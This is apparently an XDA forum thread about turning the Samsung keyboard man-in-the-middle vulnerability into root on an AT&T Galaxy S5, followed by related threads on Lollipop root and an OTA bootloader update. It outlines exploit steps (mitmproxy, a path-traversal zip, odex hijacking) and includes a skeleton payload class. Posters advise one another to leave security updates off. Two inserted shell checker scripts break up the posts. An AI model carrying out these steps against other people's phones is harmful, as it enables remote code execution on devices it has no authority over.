Achieving Root on OTA 5.0 G900A using keyboard vuln? - AT&T Samsung Galaxy S 5

Hey guys, this is my first post on XDA, so I hope I have it in the correct format and place; if not, just politely let me know and I will adjust the post accordingly. This is also just a theory I have on how to achieve root with the OTA 5.0 update, and would like the community's feedback on whether this would work or not.
First, let me start by saying that I don't have much experience with rooting, but I have done a lot of reading and research about how it works and feel like I have a good understanding of how it works. I do, however, have a lot of programming and computer security experience, so I like to stay current on active vulnerabilities and such, whether it be on mobile devices or computers.
So I stupidly took the OTA update to 5.0 before checking to see if anyone had managed to achieve root, only to find out that 5.0 root hasn't been achieved on my model yet, so I started to look for a way to do it myself. As I was browsing around for general info on the G900A, the keyboard vulnerability stuck out to me immediately.
To summarize the vuln: "A remote attacker capable of controlling a user’s network traffic can manipulate the keyboard update mechanism on Samsung phones and execute code as a privileged (system) user on the target’s phone. This can be exploited in a manner that requires no user interaction — a user does not have to explicitly choose to download a languagePack update to be exploited." So essentially, if I were to set up my own rogue Wi-Fi access point, I'd be able to execute any code I want in a privileged context.
On NowSecure's website, they go into deep detail on the specific steps of recreating this exploit, but to summarize here are the general steps:
Step 1:
Set a global Wi-Fi proxy and point our device at mitmproxy on our computer
(Essentially creating your own controlled Man-In-The-Middle attack for your phone)
Step 2:
Write a script that feeds the phone a zip containing our payload upon download request from the keyboard
Step 3:
Precompute the SHA1 of our payload and create a custom manifest file containing the SHA1
Add path traversal to the payload and attempt to write to /data/
Now, we have an arbitrary file write as system user. Next, we attempt to turn this file write ability into code execution.
Step 4:
Choose DeviceTest.apk as our target to exploit (this file is owned by a group system and is automatically invoked)
Generate an odex file with code for a BroadcastReceiver named com.sec.factory.entry.FactoryTestBroadcastReceiver
The exploit source will look like this:
Code:
➜cat FactoryTestBroadcastReceiver.java | head
package com.sec.factory.entry;
import java.lang.Class;
import java.io.File;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class FactoryTestBroadcastReceiver extends BroadcastReceiver {
//Exploit code here
}
Step 5:
Once the payload is created, we compile it and run it through the DalvikExchange (dx) tool to get a .jar file which includes our dalvik bytecode
Push our jar to our phone and generate the odex using
Code:
ANDROID_DATA=/data/local/tmp dalvikvm -cp /data/local/tmp/<payload.jar> com.sec.factory.entry.FactoryTestBroadcastReceiver
This will put our cache file in a directory that is readable by the shell user.
Step 6:
Patch our .odex to contain the CRC32 and modification time from the original APK's zip file so it appears to be generated from the original DeviceTest.apk
Step 7:
Trigger the vulnerability to execute the payload
Here is the fully detailed article.
So my question is: would it be feasible to use this vuln to create a payload that injects root into the system?
To check to see if you're vulnerable to this exploit
Download a terminal emulator on your phone and type:
Code:
ls -l /system/app/SamsungIME*
If you see a line that looks like:
Code:
-rw-r--r-- root root 7243414 2008-08-01 07:00 SamsungIME.apk
and the date is older than 2015-03-16, you are vulnerable.
UPDATE: As of July 1, 2015, AT&T appears to have rolled out a small OTA update that updates the bootloader from OC4 to OF2 as well as patches the keyboard vulnerability. As long as you don't take the update and the date modified for SamsungIME.apk is earlier than 2015-03-16, this vulnerability could still be of some potential benefit.
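The check described above (and repeated later in the thread with a July 1, 2015 cutoff) compares the modification date of SamsungIME.apk by eye. The script below is an added example, not part of the original post and not NowSecure's code: it parses a toolbox-style `ls -l` line, pulls out the YYYY-MM-DD field, and reports VULNERABLE, PATCHED or NOT_FOUND, using the 2015-03-16 cutoff the post gives. The sample lines are constructed to match the format shown in the post, not real output from any phone.

```shell
#!/bin/sh
# Constructed sample lines in the format Android's toolbox `ls -l` prints
# (perms owner group size date time name). They are not real phone output.
SAMPLE_VULN='-rw-r--r-- root root 7243414 2008-08-01 07:00 SamsungIME.apk'
SAMPLE_PATCHED='-rw-r--r-- root root 7243414 2015-03-16 07:00 SamsungIME.apk'
SAMPLE_NOTFOUND='/system/app/SamsungIME*: No such file or directory'

# Cutoff from the post: a SamsungIME.apk dated before this is the unpatched build.
CUTOFF='2015-03-16'

# ime_date LINE -> prints the first YYYY-MM-DD field on the line, or nothing.
# Works for toolbox output (no link count) and GNU ls (with link count) alike,
# because it looks for the date by shape rather than by column position.
ime_date() {
    printf '%s\n' "$1" | tr ' ' '\n' | grep -E '^[0-9]{4}-[0-9]{2}-[0-9]{2}$' | head -n 1
}

# ime_status LINE -> prints VULNERABLE, PATCHED or NOT_FOUND.
# A line that does not name a SamsungIME*.apk (e.g. an ls error message,
# or the bare "not found" seen later in the thread) is reported as NOT_FOUND.
ime_status() {
    line=$1
    case $line in
        *SamsungIME*.apk*) ;;
        *) echo NOT_FOUND; return 0 ;;
    esac
    d=$(ime_date "$line")
    if [ -z "$d" ]; then
        echo NOT_FOUND
        return 0
    fi
    # ISO dates compare correctly as plain strings; expr does string
    # comparison here because the operands are not integers.
    if expr "$d" \< "$CUTOFF" >/dev/null; then
        echo VULNERABLE
    else
        echo PATCHED
    fi
}

# Demo over the constructed samples. Against a real phone you would run
#   ls -l /system/app/SamsungIME* 2>&1
# on the device and feed the output to ime_status line by line.
for l in "$SAMPLE_VULN" "$SAMPLE_PATCHED" "$SAMPLE_NOTFOUND"; do
    printf '%s -> %s\n' "$l" "$(ime_status "$l")"
done
```

The script is meant to run on a computer against pasted `ls -l` output; the stripped-down toolbox on an unrooted 2015 device may lack `grep -E`, `head` or `expr`, so do the `ls -l` on the phone and the comparison on your machine. Note that the 2014-03-25 date mentioned later in the thread also sorts before the cutoff and is therefore reported as VULNERABLE, matching what the thread says about it.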

Here is the link you're wanting to post.
https://www.nowsecure.com/blog/2015/06/16/remote-code-execution-as-system-user-on-samsung-phones/
I really hope you are on to something.
I used terminal emulator and it looks like this (attached)
Looks like I'm vulnerable.
You seem to know your stuff and I hope some people can work with you to make some things happen
I just read the full article from your source... in theory root should be possible. I'm not sure how, but maybe using the exploit to install cf as a system app. Then it could run with higher privileges I suppose. Or maybe just a custom zip to obtain the root.
Damn this makes me happy! I only wish I was smart enough to make it work lol
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app

adam_ky said:
I really hope you are on to something.
I used terminal emulator and it looks like this (attached)
Looks like I'm vulnerable.
Thank you!
I'd really love to collaborate with some devs or something. I would be able to test most of those steps out myself, but would need help with the scripting of the actual payload. Then if it actually works, I ultimately would want to automate it and turn it into a redistributable application that anyone could use by just clicking a few buttons (seeing as how literally every non-rooted S5 should be vulnerable, I would want anyone to be able to use it). But I would need some help on that as well.
Also, until I (or anyone else) can confirm that this method either succeeds or fails, I'd hold off on taking any security updates that may patch this, just in case this method does end up working.
adam_ky said:
I just read the full article from your source... in theory root should be possible. I'm not sure how, but maybe using the exploit to install cf as a system app. Then it could run with higher privileges I suppose. Or maybe just a custom zip to obtain the root.
That's exactly what I was thinking. If this exploit works the way I think it will, there should be no real constraints on the code you can execute and privilege escalation should be a breeze whether it's with something like cf, or a custom zip.
adam_ky said:
Damn this makes me happy! I only wish I was smart enough to make it work lol
Haha I was pretty ecstatic when I happened upon this and I couldn't really believe that no one else had put these two ideas together before I did. I tend to be more of a lurker on forums, so I was kind of iffy about posting this, but I'm really glad it's being well-received so far!
I'm really excited for this exploit's potential and can't wait to see where this leads!

https://www.nowsecure.com/blog/2015/06/16/remote-code-execution-as-system-user-on-samsung-phones/
I'm not sure it would be possible for an automated means of execution via an app or something. The one step in the process mentions that what has to be entered is device unique. But with the exploit it is kind enough to give you that bit of info needed.
The best we might be able to hope for here is connecting to your own personal wifi network with capabilities of injecting the code exploit. Which shouldn't be too hard really.
We just need someone to create a payload for us and have a good step by step howto.
I'd be willing to volunteer both my time and device for testing this. I, like you, just need a bit of help.
However if no help comes I may try it myself lol
I'm pretty sure I can work out the steps. And set up a connection that's capable of injecting the code through the keyboard exploit. I just need help with the scripts.
This exploit could do so much really... besides root. You could use it to delete preloaded bloat system apps. You could use it to edit the build.prop. You could use it to manually edit the hosts file. Should be able to run the script that allows read/write permissions over the whole device for the user.
I'm glad I have had my security updates set to off since the beginning as this has supposedly been fixed and pushed by Samsung through the policy updates
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app

adam_ky said:
I'm not sure it would be possible for an automated means of execution via an app or something. The one step in the process mentions that what has to be entered is device unique. But with the exploit it is kind enough to give you that bit of info needed.
The best we might be able to hope for here is connecting to your own personal wifi network with capabilities of injecting the code exploit. Which shouldn't be too hard really.
We just need someone to create a payload for us and have a good step by step howto.
I'd be willing to volunteer both my time and device for testing this. I, like you, just need a bit of help.
However if no help comes I may try it myself lol
I'm pretty sure I can work out the steps. And set up a connection that's capable of injecting the code through the keyboard exploit. I just need help with the scripts.
This exploit could do so much really... besides root. You could use it to delete preloaded bloat system apps. You could use it to edit the build.prop. You could use it to manually edit the hosts file. Should be able to run the script that allows read/write permissions over the whole device for the user.
I'm glad I have had my security updates set to off since the beginning as this has supposedly been fixed and pushed by Samsung through the policy updates
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Yeah, by automating it, I was thinking more along the lines of building an executable to be run on a computer that contains the necessary MITMproxy program, script for feeding the phone a zip, the actual payload, etc.
And the unique identifiers should only change based on the current version of android and which variant of the phone it is. So if I'm reading it right, the identifiers should all be the same for every G900A running 5.0. Either way, this exploit should be easy enough for most everyone to use, but it'd still be nice to make a program with a nice interface to it.
Yeah, I think with this exploit you could basically have control over just about anything you want, the only hard part would be making a payload for each thing you want to do.
As far as the exploit being fixed by Samsung, I think they have acknowledged the exploit and have "fixed" it, but the patches either haven't been pushed from Samsung to the carriers for distribution or the carriers haven't pushed out the update to fix it yet. According to NowSecure's website,
"As of June 16 2015, this is the known (but not all-inclusive) list of impacted devices by carrier with patch status:
Device | Carrier* | Patch Status
Galaxy S6 | Verizon | Unpatched
Galaxy S6 | AT&T | Unknown
Galaxy S6 | Sprint | Unpatched
Galaxy S6 | T-Mobile | Unknown
Galaxy S5 | Verizon | Unknown
Galaxy S5 | AT&T | Unknown
Galaxy S5 | Sprint | Unknown
Galaxy S5 | T-Mobile | Unpatched
Galaxy S4 | Verizon | Unknown
Galaxy S4 | AT&T | Unknown
Galaxy S4 | Sprint | Unknown
Galaxy S4 | T-Mobile | Unknown
Galaxy S4 Mini | Verizon | Unknown
Galaxy S4 Mini | AT&T | Unpatched
Galaxy S4 Mini | Sprint | Unknown
Galaxy S4 Mini | T-Mobile | Unknown
"
So I'm fairly certain that there won't be many phones that have the exploit patched (yet), which is definitely a good thing for all of us right now.

I wish some other people would chime in... surely this interests more people than just you and I.
I'm sure this community can make something workable out of this exploit.
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app

I really do too. I thought people would be all over this, and this is really the best place to post it

Today I had a talk with Samsung IT crew. General reason was wifi leakage on boc3 firmware on Sm-n910c. Also had a talk about keyboard vulnerability. Samsung's IT leading engineer told me they know about it and it's on final stage of fixing. So in very short time it's gonna be fixed and no more hacking over keyboard will be available. So this door is finally to close soon (bad part is that also rooting over it will be impossible, but it's nice that Samsung very soon rolls out a fix for it so no more remote injections and hacking will be possible). So hurry up, doors are closing soon finally. You should contact chainfire, maybe he will help you in rooting that phone.
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app

Sapphire999 said:
Today I had a talk with Samsung IT crew. General reason was wifi leakage on boc3 firmware on Sm-n910c. Also had a talk about keyboard vulnerability. Samsung's IT leading engineer told me they know about it and it's on final stage of fixing. So in very short time it's gonna be fixed and no more hacking over keyboard will be available. So this door is finally to close soon (bad part is that also rooting over it will be impossible, but it's nice that Samsung very soon rolls out a fix for it so no more remote injections and hacking will be possible). So hurry up, doors are closing soon finally. You should contact chainfire, maybe he will help you in rooting that phone.
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app
Oh interesting. Did they happen to mention any kind of time frame or just that they were in the final stages?
And I'll try to contact chainfire, but it seems like he hasn't been active on his G+ for a few months.

They told me it's on final testing stage. But that was about the Galaxy Note 4 talk that we had. Not sure about other models. I simply asked of it since it's bad when over wifi my phone can be hacked by some man in the middle. So if you plan to still use that keyboard hack, you probably should ban updates to avoid that door closed.
And as they told roll out can happen from day to day. Meant very soon.
I also searched the web, your device should be rootable. If last ota update hack fails, use sammobile and downgrade os to root it and then search rooted custom roms
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app

Sapphire999 said:
They told me it's on final testing stage. But that was about the Galaxy Note 4 talk that we had. Not sure about other models. I simply asked of it since it's bad when over wifi my phone can be hacked by some man in the middle. So if you plan to still use that keyboard hack, you probably should ban updates to avoid that door closed.
And as they told roll out can happen from day to day. Meant very soon.
I also searched the web, your device should be rootable. If last ota update hack fails, use sammobile and downgrade os to root it and then search rooted custom roms
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app
Ah, ok. Thank you for sharing and I'll definitely keep any updates disabled.
And I think there's a problem with downgrading due to the bootloader being locked by AT&T.

You're welcome. My device is unlocked likely. Anyway, guess you can search sammobile. Maybe you will succeed somehow to downgrade.
Loool. I have an idea. If you succeed in hacking keyboard etc, probably you could somehow face ota to downgrade firmware. Hmmm... you know what. There is an option. Not sure if it will work, but still. Try getting custom rom. And boot your phone even with original firmware into recovery mode. Usually volume up + home + power. If it works, you can make restore from zip deploying custom rom.
Maybe it will not work, but you can try. If a bit lucky, you wouldn't need root on current rom. No warranties and it's just in theory. Try at your own risk.
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app
---------- Post added at 04:42 AM ---------- Previous post was at 04:22 AM ----------
http://hexamob.com/how-to-root/android-rooting-method-samsung-galaxy-s5/
Doesn't this one work for you?

No, that way doesn't work and is for a previous version of android, not 5.0. When the G900A is updated to 5.0, the bootloader firmware is updated to patch the exploit that that method uses.

https://www.youtube.com/watch?v=1dYoDX07Cks
Told any S5 running lollipop. Unfortunately or likely, I don't know what locked bootloader means. Never had such. Does it mean that recovery mode and odin mode are unavailable (not launchable)?

As of this moment, if an att s5 sm g900a took the ota update to lollipop, there is no means to gain root access.
If you achieve root on kitkat, you can update to lollipop and keep root.. but that's it.
This keyboard exploit is our only possible ray of hope at this moment.
Root may not even be possible with it as it runs with system privileges.. which is actually not the same as root privileges.. however system privileges can do a lot and I got hope for it.
Even if root can't be obtained.. this exploit could be used to do things to the device that we currently can't. Could possibly remove system and preinstalled bloat. It can definitely install an app as a system app... that should be able to accomplish quite a bit.
The possibilities are endless really.
I am thankful the exploit is there and hope we can accomplish something with it before everyone gets patched.
I have my security policy updates disabled and I suggest you do the same for the time being if anyone out there is in the same boat as us.
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app

Couldn't have said it better myself.
Also, I have attempted to contact Chainfire on both of his G+ accounts, so hopefully something can come of that too.

Hmm if so, just keep in mind not only to disable updates, but to keep away from wifis with internet access. On some conditions auto update settings are ignored if connected to wifi. Surely depends on exact system and model. But keep it in mind. Well. If you gain system app privileges, then possibly you get partitions access. That's a hope to deploy something like twrp recovery and flash custom rom. Info about soon coming keyboard breach fix I got for GN4 model SEB (Baltic) region. Can't say anything exact about other models and regions. But generally if Samsung is one step away from rolling it out in Baltic, quite possibly other regions are coming also soon.
Sent from my Galaxy Note SM-910C running SweetROM v14 using XDA free app

I just got an update and it's a bootloader upgrade from oc4 to I forgot and I suspended the update till I can get some more info . Check and see if you have it .
Sent from my SAMSUNG-SM-G900A using Tapatalk

superp32 said:
I just got an update and it's a bootloader upgrade from oc4 to I forgot and I suspended the update till I can get some more info . Check and see if you have it .
Sent from my SAMSUNG-SM-G900A using Tapatalk
From all the information I've gathered, this update does appear to patch the keyboard.
EDIT: I do have an available update too and attached a screenshot.
EDIT 2: I've seen the "Date modified" of the SamsungIME.apk change to one of two dates after taking the small OTA, either 2014-03-25 or 2015-03-16. If the date is the one from 2014, the vulnerability should still be active, but if it's the newer one, it appears to have been patched.

FYI... I posted the screen shot showing the 2015 update but my phone was already loaded with 5.0/OC4 when I received it from at&t last week and I have not updated to the new bl. Hope some can still benefit from the keyboard vulnerability even if I can't.

Related

How long till we may see the 6 rooted?

I've never owned a Nexus/Google phone, how long would you all guess it's going to take to root the Nexus 6?
Thanks! :fingers-crossed:
Kidding I hope
Pyros2008 said:
I've never owned a Nexus/Google phone, how long would you all guess it's going to take to root the Nexus 6?
Thanks! :fingers-crossed:
Before you even get it
Sent from my A0001 using XDA Free mobile app
Nope, the first time I rooted was a month ago, my Note 3. I take it the device can be rooted off the bat.. or there something else I am missing?
Give Chainfire a couple hours with the phone
Pretty sure the process will be similar to other Nexus devices... Fastboot oem unlock, etc, etc.
http://phandroid.com/2014/11/17/nexus-6-lollipop-root/
all hail king chainfire?
kgeissler said:
http://phandroid.com/2014/11/17/nexus-6-lollipop-root/
That has 6 nexus devices with root. But not the nexus 6.
I would make sure to wait until Google releases the factory image before rooting just in case something goes wrong
I'm pretty sure that the factory images have to be out as he has to create a modified kernel for the N6 for superuser to work on 5.0.
lordgodgeneral said:
I'm pretty sure that the factory images have to be out as he has to create a modified kernel for the N6 for superuser to work on 5.0.
I think he just patches the existing kernel so don't think he would need images. Think being the key word there as I don't know for sure how it works exactly.
You don't need a developer to root a nexus. Boot into the bootloader, connect to your computer, run: fastboot oem unlock, then install the recovery of your choice via fastboot (fastboot flash recovery blahxxx.img), then just flash whatever superuser you want (e.g. SuperSU)
Sent from my XT1053 using Tapatalk
bongostl said:
You don't need a developer to root a nexus. Boot into the bootloader, connect to your computer, run: fastboot oem unlock, then install the recovery of your choice via fastboot (fastboot flash recovery blahxxx.img), then just flash whatever superuser you want (e.g. SuperSU)
Sent from my XT1053 using Tapatalk
Sorry but this is no longer accurate. First off, there are no custom recoveries yet. Second, lollipop requires additional work arounds for root other than just flashing superuser.
akellar said:
Sorry but this is no longer accurate. First off, there are no custom recoveries yet. Second, lollipop requires additional work arounds for root other than just flashing superuser.
Hm? I'm running oneplus one with root on lollipop. All I had to do was just flash supersu in recovery.
Hopefully we can see a twrp on nexus 6 soon.
Sent from my A0001 using Tapatalk
zephiK said:
Hm? I'm running oneplus one with root on lollipop. All I had to do was just flash supersu in recovery.
Hopefully we can see a twrp on nexus 6 soon.
Sent from my A0001 using Tapatalk
It's likely not a complete build with the SELinux improvements that google made to the kernel. You need to modify the kernel on lollipop to have root so your one plus probably just has a ROM not a full image of the lollipop on it. Also as stated earlier you can't root anything without the factory image posted by google for the nexus. Then the developers can have at it. Until your happens we are just left waiting.
Pilz said:
It's likely not a complete build with the SELinux improvements that google made to the kernel. You need to modify the kernel on lollipop to have root so your one plus probably just has a ROM not a full image of the lollipop on it. Also as stated earlier you can't root anything without the factory image posted by google for the nexus. Then the developers can have at it. Until your happens we are just left waiting.
SELinux is currently permissive and yep it's built off CM12 sources. But to answer OP's question, probably won't take too long but no ETAs.
zephiK said:
SELinux is currently permissive and yep it's built off CM12 sources. But to answer OP's question, probably won't take too long but no ETAs.
Then that's why you can flash it in recovery. Normally you wouldn't be able to if it wasn't changed.
Chainfire said:
On LPX13D, SELinux, and root
As promised, here are some more details about the current situation.
Why it breaks
Google has really put some effort into better securing Android, and we've seen a lot of SELinux related commits to the AOSP tree over the past months. There is some disconnect between the AOSP tree and actual L preview builds, some things from AOSP are not in the L preview build, and vice versa. Ultimately, it's a pretty good bet these things will mostly align, though.
On most devices and firmwares, SuperSU's daemon is started by the install-recovery.sh service script that runs at system boot time, as user root with the init context. This is what the daemon needs to function.
Recently, they've started requiring all started services to run in their own SELinux context, instead of init. Developers and security guys following AOSP have known this was coming; AOSP builds have been logging complaints about this specific service not having its own context for a while now.
Now this script runs as root, but as the install_recovery context, which breaks SuperSU's operation, as it is a very restrictive context.
In the last AOSP build I have tried (a few weeks old), there were a fair number of other holes that we could use to launch the daemon. At first glance(!), it seems those have all been closed. An impressive feat by the guys working on this, if it proves true.
How to fix it
To fix root, all that really had to be done was ensure the daemon's startup script is run at boot as the root user with the init context.
There are multiple ways to do this, but unfortunately for now it seems that it does require a modified kernel package (changing the ramdisk).
In the modified kernel packages I've posted for the Nexus 5 and Nexus 7, the daemon's startup is fixed by commenting out the line in init.rc that forces the install-recovery.sh script to run as the install_recovery context, so now it runs as init again, and all is well.
Repercussions
As stated above, it seems for now that modifications to the kernel package are required to have root, we cannot attain it with only modifications to the system partition.
Combine that with a locked bootloader (and optionally dm-verity) and a device becomes nigh unrootable - exactly as intended by the security guys.
Exploit-based roots are already harder to do thanks to SELinux, and now because of the kernel requirements for persistent root, these exploits will need to be run at every boot. Exploits that make the system unstable (as many do) are thus out as well.
Of course, this is all dependent on OEMs implementing everything exactly right. If a certain OEM doesn't protect one of their services correctly, then we can leverage that to launch the daemon without kernel modifications. While I'm fairly certain this will be the case for a bunch of devices and firmwares, especially the earlier L firmwares, this is not something you should expect or base decisions on. It is now thus more important than ever to buy unlocked devices if you want root.
It might also mean that every firmware update will require re-rooting, and OTA survival mode will be broken. For many (but far from all) devices we can probably automate patching the kernel package right in the SuperSU installer ZIP. We can try to keep it relatively easy, but updating stock firmwares while maintaining root is probably not going to work as easy and fast as it did until now.
Apps need updates
Unsurprisingly, with a new major Android release, apps will need updates. None more so than apps that go beyond the Android API, as root apps do, but even some non-root apps will be affected by the security changes.
As one example, someone posted in the SuperSU thread of a kernel flashing app that didn't work. From the logcat you could see that it was looking for partitions in /dev/block from its normal non-root user and non-init context. That used to be possible, but now it is restricted: normal apps no longer have read access there.
The solution for that app is actually quite simple: list the /dev/block contents using root instead. But simple solution or not, the app will still need to be updated.
By far most root apps should be updateable for L without too much issue. There are indeed exceptions that will need some special care, but those are rare.
Permissive vs enforcing
The kernel packages I posted for the Nexus 5 and 7 LPX13D firmware keep SELinux mostly set to enforcing. I say mostly, because SuperSU actually switches a small part of the system to permissive, so apps calling su can do most things without much interference. The details on this are lengthy (yes, your apps will be able to modify policies as well if needed, which should be rare), and I will document these for other developers after L retail release, assuming it will all still work at that time.
Alternatively, you can set the whole system to permissive or otherwise disable SELinux. There are other kernel packages released that indeed do this. The advantage here is that it instantly fixes some apps' issues, as the SELinux based restrictions have all gone the way of the dodo. The disadvantage here is that you've just shut down a major part of the security system of the device.
Some would argue that a device with an unlocked bootloader, root, encrypted modem firmwares of which nobody really knows what they're doing, etc, is inherently insecure, and thus disabling SELinux doesn't make much difference.
I personally disagree with this. While I do agree that these things weaken security down from the ideal level, I would still not disable more security features than I absolutely need to. Just because you cannot eliminate all attack vectors, is no reason to just completely give up on defending against them.
It is of course your own choice if you want to run a permissive system or not. I will strive to keep everything working in enforcing mode though, and I hope other root app developers will do the same - as stated earlier in the post, I believe this is still possible.
(everything in this post is subject to change for retail L release, obviously)
https://plus.google.com/+Chainfire/posts/VxjfYJnZAXP
http://www.xda-developers.com/android/supersu-beta-2-23-lollipop/
Pilz said:
Then that's why you can flash it in recovery. Normally you wouldn't be able to if it wasn't changed.
Good news everyone, starting one of the upcoming SuperSU updates, modified kernels will no longer be needed for root on Android 5.0 ... !
https://twitter.com/ChainfireXDA/status/535253476021116928

[Q] July 1st, 2015 OTA updated bootloader

Hey guys, I just checked my At&t GS5 for updates and I had an available update to take. It was approximately 295 MB and it changed the bootloader from OC4 to OF2, however, my android version is still 5.0.
I've searched xda, I've called At&t, and I've been on Google and I cannot find anything on today's small update that changed my bootloader from OC4 to OF2.
My question is this:
Does anybody know what the current version of lollipop is supposed to be for the At&t galaxy s5 SM-G900A, and does anybody know why AT&T would push out such a small update that changes the bootloader? I'm not trying to root- when I get back into rooting, I'll use a non carrier branded phone or a model without a locked bootloader.
I realize that 5.1.1 is confirmed on the att galaxy s5 at some point, but I'm very confused about today's update that I took. I'm still on android 5.0 and I keep hitting brick walls regarding the SM-G900A, its current version of lollipop, and what this update that I received today that changed my bootloader/build from OC4 to OF2 is.
Will someone please explain how this works? If they updated the bootloader today, 7/1 /15, and I'm still on 5.0, could it mean that 5.1 is around the corner?
I'm asking because I've never seen an update that changed the build number and bootloader, but didn't change the android version running on the phone.
Thanks yall.
No information on the update, if I were to guess this is to patch the Samsung Keyboard vulnerability.
Though it's over 200MB and I'm probably completely wrong
Maybe I can dream that AT&T decrypted the bootloader?
It's weird... I'm on 5.0 but not on the OC4 bootloader any longer... it wasn't a very big update.
M2490311, Would you mind checking to see if it did patch the keyboard vulnerability?
To check to see if you're vulnerable to this exploit:
Download a terminal emulator from the play store and type:
Code:
ls -l /system/app/SamsungIME*
If you see a line that looks like:
Code:
-rw-r--r-- root root 7243414 2008-08-01 07:00 SamsungIME.apk
and the date is older than July 1, 2015, it did not patch the vulnerability.
Also, if you do check to see if it was patched, could you take a screenshot of the terminal?
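As an added example (not from any poster in this thread), here is a POSIX sh helper that applies the date test above to an `ls -l` line and also handles the "not found" outcome; the sample lines are constructed to mirror the thread's output, and the mtime is treated only as a hint, since the thread itself shows a date that changed while still staying old.

```shell
#!/bin/sh
# Added example: classify the `ls -l /system/app/SamsungIME*` output from the
# thread. Rule from the post above: a SamsungIME.apk modification date before
# the July 1, 2015 OTA is treated as "not patched". The mtime is only a hint;
# a later post shows a date that changed yet stayed old, so read "vulnerable"
# as "check further", not as proof either way.
PATCH_DATE=20150701   # July 1, 2015 as YYYYMMDD for numeric comparison

# classify_ime_line LINE -> prints one of: missing, unknown, vulnerable, patched
classify_ime_line() {
  line="$1"
  case "$line" in
    ""|*"No such file"*|*"not found"*)
      echo "missing"; return 0 ;;
  esac
  # Android toolbox `ls -l` prints: perms owner group size YYYY-MM-DD HH:MM name.
  # Pick the first ISO-date token instead of trusting a fixed column so the
  # same function also copes with GNU ls output when run on a desktop.
  date=$(printf '%s\n' "$line" | tr ' ' '\n' \
         | grep -E '^[0-9]{4}-[0-9]{2}-[0-9]{2}$' | head -n 1)
  if [ -z "$date" ]; then
    echo "unknown"; return 0
  fi
  num=$(printf '%s' "$date" | tr -d '-')
  if [ "$num" -lt "$PATCH_DATE" ]; then
    echo "vulnerable"
  else
    echo "patched"
  fi
}

# check_device -> runs the same test on the phone this script runs on (terminal
# emulator or `adb shell`). On Lollipop the apk normally sits in a per-app
# directory (/system/app/SamsungIME/SamsungIME.apk); `ls -l` on the glob lists
# that directory's contents, so the .apk line is still found.
check_device() {
  out=$(ls -l /system/app/SamsungIME* 2>&1 | grep 'SamsungIME.*\.apk' | head -n 1)
  [ -n "$out" ] || out=$(ls -l /system/app/SamsungIME* 2>&1 | head -n 1)
  classify_ime_line "$out"
}

# Constructed sample lines (same shape as the output quoted in the thread):
SAMPLE_OLD='-rw-r--r-- root root 7243414 2008-08-01 07:00 SamsungIME.apk'
SAMPLE_MISSING='/system/app/SamsungIME*: No such file or directory'

if [ "${1:-}" = "--device" ]; then
  check_device
else
  printf '%s\n' "old sample:     $(classify_ime_line "$SAMPLE_OLD")"
  printf '%s\n' "missing sample: $(classify_ime_line "$SAMPLE_MISSING")"
fi
```

Run it with `--device` from a terminal emulator on the phone to test the real file; without arguments it only classifies the constructed samples.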
Code:
About this update:
Real Upgrade from OC4 to OF2
Thanks AT&T
Looks like it's been patched up, date changed but it's still old.
http://i.imgur.com/MYghs6Q.png
TheBadgers said:
M2490311, Would you mind checking to see if it did patch the keyboard vulnerability?
To check to see if you're vulnerable to this exploit:
Download a terminal emulator from the play store and type:
Code:
ls -l /system/app/SamsungIME*
If you see a line that looks like:
Code:
-rw-r--r-- root root 7243414 2008-08-01 07:00 SamsungIME.apk
and the date is older than July 1, 2015, it did not patch the vulnerability.
Also, if you do check to see if it was patched, could you take a screenshot of the terminal?
I downloaded the terminal emulator and entered the exact code you provided and it kicks back with "not found."
M2490311 said:
I downloaded the terminal emulator and entered the exact code you provided and it kicks back with "not found."
Could you provide a screenshot?
Thanks AT&T
Looks like it's been patched up, date changed but it's still old.
Even if it's not the same date, as long as it's older than 2015, I think the vulnerability should still be active. Taken from NowSecure's website: "While Samsung began providing a patch to mobile network operators in early 2015, it is unknown if the carriers have provided the patch to the devices on their network." So it appears that Samsung themselves didn't even start working on a patch until 2015.
See attached.
ssn713 said:
I'm guessing it's been patched.
Whelp. Unfortunately in your case, it does appear to be patched. From what I've read, Samsung developed a patch for it in early 2015, which lines up with the "Date Modified" for your apk
QuillOmega0 said:
Maybe I can dream that AT&T decrypted the bootloader?
I would like to hear from someone that took the update to confirm or deny this part.
Most likely wishful thinking/a dream, but it would be nice.
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
Sorry for the delay in responding. I entered both values posted earlier using the android terminal emulator, and this is what I am getting:
Sorry about the repeat screenshots, I couldn't tell them apart by thumbnails. I hope this helps and again, I apologize for the delay for the poster requesting screenshots
So now my question is what this means. It's my understanding (I may be wrong, but I keep seeing conflicting info that's not up to date when I search it) that at this point in time, you can't Odin back from 5.0 to 4.4.2 or 4.4.4. I'm also under the impression that root is either nonexistent with the GS5 SM-G900A or it's a tedious process that isn't simple like towelroot. I wonder if this is going to affect root ability, and downgrade ability to attain root as well.
But then again, I was running Sickness v6 on my S4 and Safestrap literally just ceased to work and my phone bricked itself. The entire OS crashed, so I went to the AT&T store, upgraded to the S5 and they reflashed the S4. But on my S5, Knox isn't capable of being device admin, and my S5 acts as though it's been rooted. I use a different security suite than Knox, but I recall reading that if you root and flash a custom ROM, and have the official stock firmware put back on, Knox won't work on your phone. This S5 has not been rooted unfortunately, but the Knox thing is making me wonder if something on my SD card transmitted an STD.
I think I'll be sick if root was attained with ease and I missed it by a mile in my searches on the OC4 bootloader and now that I'm on OF2, I'm screwed if I want root.
That is strange that it's not found.. I'm sorry I don't know what to make of it. I would have expected to see it updated but not missing
Sent from my SAMSUNG-SM-G900A using XDA Free mobile app
M2490311 said:
Sorry for the delay in responding. I entered both values posted earlier using the android terminal emulator, and this is what I am getting:
Sorry about the repeat screenshots, I couldn't tell them apart by thumbnails. I hope this helps and again, I apologize for the delay for the poster requesting screenshots
I think you're substituting 1's (the number) where you should be putting l's (the letter).
adam_ky said:
That is strange that it's not found.. I'm sorry I don't know what to make of it. I would have expected to see it updated but not missing
